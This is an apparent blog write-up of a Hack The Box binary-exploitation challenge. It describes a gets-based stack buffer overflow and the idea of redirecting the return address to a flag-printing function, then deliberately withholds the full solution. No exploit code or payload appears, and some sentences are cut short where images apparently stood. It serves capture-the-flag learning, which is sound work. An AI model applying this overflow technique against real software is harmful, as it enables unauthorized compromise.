HTB - You know 0xDiablos
Note: this challenge is still active as of Dec 30, 2020.
I missed my flag
By reversing the ELF x86 binary into C-pseudocode, we can find out that this contains three major functions:
There's nothing useful in
main so we can proceed to
We can see here that
gets which is vulnerable to buffer overflow since it does not check the length of the input string.
As 184 bytes
0xB8 are allocated for
s, the stack structure for
vuln is like below:
s + SFP + RET
Then we see the code for
flag, which seems to be the one that prints the flag:
The mechanism here is simple: just overwrite the return address of
vuln to the one of
flag's so that it is run.
But you can see here that there is one more task: we have to manipulate
a2 each of them to match
Note that we can bypass the first if statement by creating a random flag.txt for local environments.
Unlike the previous challenge from pwnable.kr's bof, the problem here is that it is hard to find the comparison value, as
a2 is empty.
Again, the TOS of Hackthebox indicate that the user is not allowed to share solutions, so this is the all I could write.
But I can give you a simple hint: the latter condition in an
&& if statement is evaluated only if the first condition is satisfied.
Good luck :D